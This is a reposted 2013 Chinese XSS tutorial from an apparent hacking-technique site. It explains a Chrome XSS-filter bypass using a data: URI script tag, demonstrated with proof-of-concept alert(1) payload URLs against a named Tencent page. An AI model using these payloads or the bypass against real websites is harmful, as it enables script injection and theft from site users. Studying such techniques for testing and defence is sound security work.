记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

那些年我们一起学XSS - 17. XSS过滤器绕过 [通用绕过]

2013-02-13 23:12

关于反射型的基本东西,暂时就到这啦,如果后面有什么好的case,再做增补。最近,有些人会问到怎么绕过浏览器的XSS过滤器,所以从这节开始,给出点绕过的例子。当然这些绕过浏览器的方法,不是万能的。不同浏览器,不同场景都会存在差异。满足场景要求时,才可以使用。

此文给出的是一个来自sogili分享的chrome下绕过过滤器的方法,在腾讯某处XSS上的应用。

这一类都算是“结合了一定场景”,绕过了浏览器自身的防御机制,具有一定的通用性,我们称为“通用绕过”(瞎起的名字,别在意)。但是在后续版本的浏览器中,这些技巧可能会被浏览器干掉从而失效。再次强调:通用不是全部都行,意思是所适用的场景实际发生的概率比较高!
详细说明:
1. 其实就是个普通的XSS点,uin参数没有对任何字符进行过滤。

http://bangbang.qq.com/php/login?game=roco&uin="><img src=1 onerror=alert(1)>&world=5&roleid=44583443&level=8&role=%2


2. 正是由于这个点什么都没过滤,浏览器自身的防御机制也最好发挥作用,瞧瞧,chrome拦截了。。

 


有的新手,不知道有过滤器的,更是会觉得 “啊,这是怎么回事,怎么不行啊,明明可以的。。”

我们只要看到console里有上面那句,就说明 chrome的过滤器大发神威了!!

3. 我们也看看源码。

 


危害部分被和谐了。

4. 那么怎么绕过呢? 这里直接说方法。

5. 首先要求缺陷点,允许 < , > 。其次,要求缺陷点的后方存在 </script> 标签。 我们看看当前的这个点的代码。

...
<input type="hidden" id="sClientUin" value=""><img src=1 onerror=alert(1)>">
...
<script type="text/javascript" src="http://pingjs.qq.com/tcss.ping.js"></script>
...


6. 可以看到上面的要求均满足。我们就可以使用以下技巧。

<script src=data:,alert(1)<!--


7. 代入到我们的利用代码里。

http://bangbang.qq.com/php/login?game=roco&uin="><script src=data:,alert(1)<!--&world=5&roleid=44583443&level=8&role=%2


这次,我们就成功啦。

知识来源: www.2cto.com/Article/201302/188675.html

阅读:112533 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“那些年我们一起学XSS - 17. XSS过滤器绕过 [通用绕过]”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云